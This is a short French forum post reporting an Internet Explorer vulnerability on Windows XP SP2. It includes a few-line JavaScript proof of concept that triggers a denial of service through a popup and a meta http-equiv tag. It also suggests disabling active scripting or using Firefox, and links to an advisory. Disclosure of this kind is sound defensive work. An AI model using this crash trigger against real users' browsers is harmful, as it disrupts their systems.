Une première vulnérabilité touchant le SP2 (service pack 2 de Windows WP) a déjà été découverte
Bon elle utilise là encore une faiblesse du browser Internet Explorer:
il faut utiliser un petit proof of concept déja utilisé pour realiser un "denial of service" sur le Meta tag http-equiv :

Code:

[script type="text/javascript"]

Wnd = window.createPopup();

Wnd.document.body.innerHTML='[meta http-equiv="imagetoolbar" content="no"]';

[/script]


2 alternatives >
-Desactivez l'active scripting
-La meilleur solution reste d'utiliser Mozilla Firefox
--> http://www.mozilla.org/products/firefox/

Ah oui j'allais oublier pour en savoir légerement plus :
--> http://secunia.com/advisories/12321
http://newffr.com/viewtopic.php?forum=9&topic=8721